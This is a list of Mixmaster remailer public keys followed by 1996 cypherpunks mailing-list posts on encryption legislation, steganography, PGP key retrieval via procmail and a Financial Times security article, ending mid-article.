isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0.3

-----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

-----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

-----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

-----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

-----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

-----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

flame remailer@flame.alias.net 8b52e01256d96db2cefb21a081c64d34 2.0.3

-----Begin Mix Key-----
8b52e01256d96db2cefb21a081c64d34
258
AASr5mNwBYFstmsTI7cPjGSLwLc35A3dmh8jHzAF
ixoCn8jCc2ZAfD4WnxcwS0UYcpU0oSYZJhLrIBzq
VFNWu+C5+ayJMWBW1xr86TJLX/sNSeQBrnUqbKvF
CQW69RZzwNybGtlaPNdqhlJLc1Hr50iZOMykDbu5
hT4SY9gw+YvJHQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

-----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

secrets secret@secret.alias.net 834795b553fa43cbf33bea8f490a2b77 2.0.3b6

-----Begin Mix Key-----
834795b553fa43cbf33bea8f490a2b77
258
AATXbdk8pTt2maDkz/dtKniKIOgGnVt9HPpf85HY
Aau2yuMlwupuN4c+XwLzO1hvdKOIkrJWZagWkmZ2
irSV5sxf0vI8JZ+iKx9T+aoQJLUaBsWTUrLh24kP
+IUkVL8AmIkk+grFDdzkS2MmfpP707tlgZB4KWkk
uvjUPmBySSgS8wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

ecafe-mix mixmaster@remail.ecafe.org fff0d827161069a26ca44dead777c9ec 2.0.1

-----Begin Mix Key-----
fff0d827161069a26ca44dead777c9ec
258
AATgcIZ9GIj6VEZ2UmDO9BGmGVY5tZHVQp+2rChG
0E+lcD8lrHlWGwc/ea9Ycj8z2HGdWZl5ptXqfabf
YenIyO7YRr7teAzAAFmkBuwgBGUcpJUvIOjWlXBo
OGnku0AQYqOBDZSfknT+dAP01N82qDN13E6dUhEW
/0hdDNVghmsy2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

amnesia amnesia@chardos.connix.com f37b7c77cd62ede86abb6e10c09601c1 2.0.3

-----Begin Mix Key-----
f37b7c77cd62ede86abb6e10c09601c1
258
AAS6A7+7R0y0piA6pLPMX1ZzaLOt2pWFt4LsSfiu
hQty8V0SgfdYv5bKc2BGtfl0kLNAOG8dtyJ0TNQO
i6ZQJeZySwH6bKXrUM25VpdOmreXdzO/8vIezmOC
BfEh+vZE209WFiLBXwohqvwOIiMAYJGYDRB53Coq
Afzn2HCG9sQ37wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

-----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

black-ice mix@black-ice.gateway.com 42048f5769ecdd8df71abf49389fb3ac 2.0.3

-----Begin Mix Key-----
42048f5769ecdd8df71abf49389fb3ac
258
AASk6EDjLhIJpCRcnBHobRpu9rZrOtroaYlJNjI1
nJOGJkd9nlPHUGxqJcMcbxvvo81xyxtPtUA1TKsp
ch+hcZaibCgRoYxlMPW4QmhVr1Tl3jwyl+wBu4iT
OjoKklzy+1JW6YYMLwRi1z+Mr9EMdaWmTxrvDVDH
QeorT8rGoGNILwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

yap remailer@yap.pactitle.com cb0ffde1d93706502e3b9a2dea3b12cb 2.0.3

-----Begin Mix Key-----
cb0ffde1d93706502e3b9a2dea3b12cb
258
AATdIV0XBb1lsaP9/vKMvpIL9v4bxvcIgWZ0I4is
Xt2ZO3HXeDMCFJav+qBuoXOAsNxNImS+qGBS39sc
8fPKfQVnNpfN01ZnISyx+Bdak2bwcmpjE0enU+iN
5O5gfrIiJ65WOwBrXY1G0Q3g+fm84VOMUnU5QnMa
dsVqQ6fdlYuEdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

shinobi remailer@shinobi.alias.net ab3c9b8f6c593ec7af312f5cfec49a9b 2.0.3

-----Begin Mix Key-----
ab3c9b8f6c593ec7af312f5cfec49a9b
258
AATwDaZIFy/Qcp83lZ1BDAsdrddG1Zju8EUqpTD9
5p/d33O2i4yfHGqy2v61N/tp7YcrEBCA4w2arPL5
DC4zGxQaNe62ysu5VdZNqMaoc63xsSiAVovsf7I/
SBqCdLLkN/WYQewVTAsvUEEWp/Al42bibuXUSoa4
b5qDNXiPbM42NQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

alpha mixmaster@alpha.c2.org fb2afc9b497be22ad18abf1c41996eb0 2.0.2

-----Begin Mix Key-----
fb2afc9b497be22ad18abf1c41996eb0
258
AASlwbleW75llQtd1BAtm87lMgEyQXqzNoceouI1
CcFfermHFbNoyD6kRoG9hyVpgFph6Xx3AYTqwMcp
GaHNdFdU35ANXKo4BCC+oMzplca7JJ2tzOdDpRgp
DZhMtMtBmIazxxj7VHMe28SNvxNWz1FSCgX0lCBG
oDjg6TJAoZeBZwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

lead mix@zifi.genetics.utah.edu a76c3fda7294a6695c5e6a931d1c0b73 2.0.3

-----Begin Mix Key-----
a76c3fda7294a6695c5e6a931d1c0b73
258
AATH5fR56oEcdVRNn2SrjJ4XsoWb+lP2E2GgGdgI
2A3//3ctBkQ13xb5MHOfix8ra63PZmeCrK+6QbbV
Ql1iwboMMaWz8NPmNpQz2K0/vnTnp8tWEyL5vo95
jlRmACXPefXdLOzszAgfMn02rzzXrq+9AnaUAUxD
idxVglBkXRkriwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

gondolin mix@remail.gondolin.org ed590656117439564465d5cc539864ad 2.0.3

-----Begin Mix Key-----
ed590656117439564465d5cc539864ad
258
AATXSsts2yKvzw3LUZ7ZhW7a66vr236RzIucoPIl
PSNoWhlGEgo0kx28MjepovxOz/CSUwYOC+9McFOE
oX1xxMag0FiyOXg+pj8NGZj3JVLU3wqTA4aTsoWd
njGRlqYen31TbWMh+BOdjqRJXUUHF5U+/acbmsdE
njjw+6DFw8PkpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

treehole treehole@mockingbird.alias.net 2c9f098377bf4f068751683f803834f5 2.0.3

-----Begin Mix Key-----
2c9f098377bf4f068751683f803834f5
258
AATbAJfluLcAdyjxCbL3inzUHRbarWgLZRzIILCZ
rtIYBpw/lGC6AcEJpheq/gl7r1f60B2CPNPTpMZb
GJHAQnPUyTRZ9PNJ+UBExaFYUABOR06Nz392K9Gx
mBZDrWDqb/q/c5wHp8PSGpfTiSCF9awWctuSsT3e
S4W9kpCaxRweewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

nemesis remailer@meaning.com f59733a7f257900b09eb138764259a38 2.0.3

-----Begin Mix Key-----
f59733a7f257900b09eb138764259a38
258
AAS9p2Sdua2d0mtVhhj0qS+RZzawvOCP4Uo2HZZA
R3asMJNIVWQyi0jKnOxnHYAr6EizrUX7GdeVVtQw
gcjrqhnf1QWMLCZU0L5418uNmbqswGbIVsTK3nsE
ShWieAl61R4EDerMheDDlBkuKLTGkOAs4UTAL+Mf
fanvf9nqRolmOQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

spook mixmaster@spook.alias.net 5c46a4b6c2cf00bfc7f693be81f88554 2.0.3

-----Begin Mix Key-----
5c46a4b6c2cf00bfc7f693be81f88554
258
AATTyAxnMTTfT5rCnOBCajbfwl7Zj32oGPrTxRcj
YDbZb/czR3bR6Yb/uEOtJjhz3tq8gkxEt4XAw+gV
cdBxsPYTg3VPoPYO1F6CvmWxUwWkgwx+URibZoWN
yGcLefH06Wdon7hhQZI3LzpXbL9p4zseVKr4fD5y
lpjefLNO2Ww4mwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 5 Mar 96 17:00:49 PST
To: cypherpunks@toad.com
Subject: Re: NYT on Crypto Bills
In-Reply-To: <199603050354.WAA06580@homeport.org>
Message-ID: <TRDckD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> Dr. Dimitri Vulis wrote:
>
> | Yes - the Markoff quote is factually incorrect.  I'm sure he knows better
> | than this.  Must be the Times editing.
>
> This mistake has popped up multiple times in his work.  I'm not sure
> he's aware of it.

Well, his address is markoff@nyt.com and he does read his e-mail.
I wonder if he's on this list?  Probably not, too much noise. :-)
(I also spoke to him on the phone a few times some years ago, but
have no idea what his # is.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.cais.net!nntp.uio.no!ns.ftns.no!news@warwick.com
Date: Wed, 6 Mar 96 07:20:59 PST
To: cypherpunks@toad.com
Subject: Re: Test
In-Reply-To: <313B33A3.5956@ringnett.no>
Message-ID: <313CD86F.78DB@ringnett.no>
MIME-Version: 1.0
Content-Type: text/plain


> This is a test...


Follow up on test...test...test

--
Live on the edge, push the limits, and go EXTREME...
--------------------------------------------------------------------------
Svein Ove Solsvik          *  E-Mail:                 sveinove@ringnett.no

-Dyslexic atheists don't believe in Dog.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:57:54 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Ayse Sercan wrote:

> At any rate, if I were the mother, and my kid was being led away by a
> clerk who could have been the very pervert who thought that those nude
> pictures meant child pornography, I'd certainly do everything in my power
> to protect my child from such an individual.

That's rediculous. The mother did not flip because Zona led the child away.
The mother flipped when asked about the photos. This caused Zona to not
want the child to see argument. The mother just has serious problems in
general. She feels justified in trashing the place and throwing the lamp,
which is why she refused the punishment and took 30 days in jail. She,
in the presence of her child, was wrong to get violent. She has a lack of
control.

-- 

617/253-6515   http://grim.media.mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Wed, 6 Mar 96 06:28:26 PST
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: Steganography idea: CU-SeeMe
In-Reply-To: <199603060734.AAA00178@nelson.santafe.edu>
Message-ID: <Pine.3.89.9603060803.B1536-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Mar 1996, Nelson Minar wrote:

> The thing that bothers me about existing steganography code I've seen
> is that it all uses uncommon communication channels to hide data. For
> instance, the "hide data in a picture" programs: useful, up to a
> point, but how often do I send pictures to other people? I think to be
> effective, methods need to be employed that exploit existing, well
> used communication channels.

Then he sez:

> So here's one idea I've had as a place to hide a channel: network
> video, in particular CU-SeeMe video streams. CU-SeeMe is a lowtech

I think it likely that people will be sending GIFs and JPEGs to each 
other far more often than video.  Video is far more an "uncommon 
communications channel" than is a uuencoded picture.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 6 Mar 96 06:33:51 PST
To: cypherpunks@toad.com
Subject: Whut it sez
Message-ID: <960306093341.20204b9a@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



Note: downloaded from www.vtw.org so cannot guarentee correctness-

  "§2804. Unlawful use of encryption to obstruct justice"    
   "Whoever willfully endeavors by means of encryption to obstruct,   
   impede, or prevent the communication of information in furtherance 
   to a felony which may be prosecuted in a court of the United States, 
   to an investigative or law enforcement officer shall-..."

Interesting wording - sounds almost like if you impede the *commission* of 
a felony, you is been had. Keyword would seem to be "willingly". Suspect
they meant to say "...obstruct (etc) the investigation of a felony..."

  "(b) CONTROL OF EXPORTS BY SECRETARY OF COMMERCE.-
     "(1) GENERAL RULE.-Notwithstanding any other law, subject to
      paragraphs (2), (3), and (4), the Secretary of Commerce shall have  
      exclusive authority to control exports of all computer hardware,
      software, and technology for information security (including
      encryption), except computer hardware, software, and technology that    
      is specifically designed or modified for military use, including
      command, control, and intelligence applications.     

This would seem to extend ITAR, not limit it.

     "(2) ITEMS NOT REQUIRING LICENSES.-No validated license may be
      required, except pursuant to the Trading With The Enemy Act or the
      International Emergency Economic Powers Act (but only to the extent
      that the authority of such Act is not exercised to extend controls
      imposed under this Act), for the export or reexport of- 
      "(A) any software, including software with encryption capabilities, 
       that is- "(i) generally available, as is, and designed for 
                 installation by the purchaser; or
               "(ii) in the public domain or publicly available because 
                 it is generally accessible to the interested public in 
                 any form; or
      "(B) any computing device solely because it incorporates or employs 
       in any form software (including software with encryption 
       capabilities) exempted from any requirement for a validated license 
       under subparagraph (A). 

Microsoft's CryptoAPI seems OK. PGP would seem to fall under both (i) 
and (ii).

     "(3) SOFTWARE WITH ENCRYPTION CAPABILITIES.-The Secretary of Commerce 
      shall authorize the export or reexport of software with encryption 
      capabilities for nonmilitary end-uses in any country to which exports 
      of software of similar capability are permitted for use by financial 
      institutions not controlled in fact by United States persons, unless 
      there is substantial evidence that such software will be-
       "(A) diverted to a military end-use or an end-use supporting 
        international terrorism;
       "(B) modified for military or terrorist end-use; or     
       "(C) reexported without requisite United States authorization.

Thank you MasterCard/VISA for SET. Note that it does not seem to say that
you do not need a license, just that one shall not be witheld without
"substantial evidence".

      "(4) HARDWARE WITH ENCRYPTION CAPABILITIES.-The Secretary shall 
        authorize the export or reexport of computer hardware with 
        encryption capabilities if the Secretary determines that a product 
        offering comparable security is commercially available from a 
        foreign supplier without effective restrictions outside the United 
        States.     
 
Same comment except that token & INE vendors will have to demonstrate that 
a foreign competitor exists.

Real lawyers please comment.
					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 6 Mar 96 06:57:05 PST
To: wb8foz@nrk.com
Subject: Re: PGP 3.0/4.0
In-Reply-To: <199603061313.IAA07336@nrk.com>
Message-ID: <199603061501.KAA16783@homeport.org>
MIME-Version: 1.0
Content-Type: text


David Lesher wrote:

| How about code that goes out & fetches keys upon demand, al-la DNS?

This works with procmail to get keys for all mail I receive.  I
discovered the problem is your keyrings get unmanageably large when
you do this.



# auto key retreival
#
# I have an elm alias, pgp, points to a keyserver

:0BW
* -----BEGIN PGP
*!^FROM_DAEMON
KEYID=|/home/adam/bin/sender_unknown

:0 ahc	# added h 8 jan 95
* ! ^X-Loop: Adams akr
| formail -a"X-Loop: Adams akr" |elm -s"mget $KEYID" pgp

# add the incoming keys to the ring

:0
* From bal@swissnet.ai.mit.edu
{
   # if we accidentally get the whole thing.
   :0 h
   * >10000
   /dev/null

   :0 h
   *^Subject:.*no keys match
   /dev/null

   :0:
   *Subject: Your command, ADD
   $DEFAULT


   :0E
   | pgp +batchmode -fka
}

sender_unknown:
#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $output is to get the exit status. Othierwise, this would be a one
liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode  -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$? 
if [ $EV -eq 0 ]; then 
        echo $OUTPUT | awk '{print $6}' 
fi
exit $EV


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Choi (SAR)" <choi@virtu.sar.usf.edu>
Date: Wed, 6 Mar 96 07:22:01 PST
To: cypherpunks@toad.com
Subject: Re: Signature 2
In-Reply-To: <v02140b00ad6277991102@[199.2.22.124]>
Message-ID: <Pine.SUN.3.91.960306101032.24859A-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


> In the "real world" there is nothing to prevent someone from forging
> your real signature on a check or document or from disguising themselves
> as you and taking your place at an important business meeting.  The
> digital equivalents can be slightly more secure, but nothing is ever
> perfect.
> 
> jim
> 
Heh.  Whoops.  I may be a beginner but I'm not THAT green.  I shoulda 
known better than to use that exact wording.  Please excuse the 
inappropriate wording, all.

							Sincerely.
							Quentin Holte.
							( aka Charles Choi. ) 
							
							You are all the Buddha.
								- Last words
								  of Buddha.

							If you see the Buddha,
                                            		             kill him.
                                                                - Zen proverb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 6 Mar 96 07:24:01 PST
To: cypherpunks@toad.com
Subject: FT on Crypto Cloud
Message-ID: <199603061523.KAA27263@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, March 6, 1996, IT Section, p. V. 
 
 
   Network Security: Operating under a cloud of uncertainty 
 
      Companies face a complex web of technical, legal and 
      moral questions 
 
 
   The IT security threat has long been depicted in terms of 
   wild-eyed hackers hunched over terminals late into the 
   night. But while there is real cause for concern about 
   criminal activity over computer networks, large 
   corporations are very worried about another threat to their 
   use of electronic communications. 
 
   Meanwhile, government restrictions on the use of data 
   encryption codes in various countries are limiting the 
   ability of commercial organisations to protect themselves. 
 
   Cryptography is at the heart of this dilemma. Governments 
   all over the world rely on specialist intelligence units to 
   break down data transmissions from other nations and 
   individuals while encrypting their own messages. 
 
   The US National Security Agency and the UK's Government 
   Communications HQ are the best-known of these agencies. 
 
   The NSA is notorious for obsessive secrecy. Meanwhile, in 
   the UK, the GCHQ has lifted its traditional reticence in 
   recent years to offer advice to British companies concerned 
   with data security. 
 
   Mr Roger James, chairman of Cheshire-based communications 
   software specialist Boldon James, has worked with GCHQ to 
   define data standards for UK government departments. Mr 
   James plays down the cloak-and-dagger imagine of GCHQ, but 
   instead he describes his contact with its staff as 
   "horribly technical". He also portrays the Cheltenham 
   code-breakers as "very down-to-earth people". 
 
   There are two ways of looking at security, he says "one is 
   the practical approach, which means accepting that perfect 
   security is impossible to obtain. The other is the Ivory 
   Tower approach, which involves dreaming of a world in which 
   security is absolute. There are a lot of 'practicalists' in 
   GCHQ". 
 
   Mr James, whose clients include the Britannia Building 
   Society and the German Navy, is active in the European 
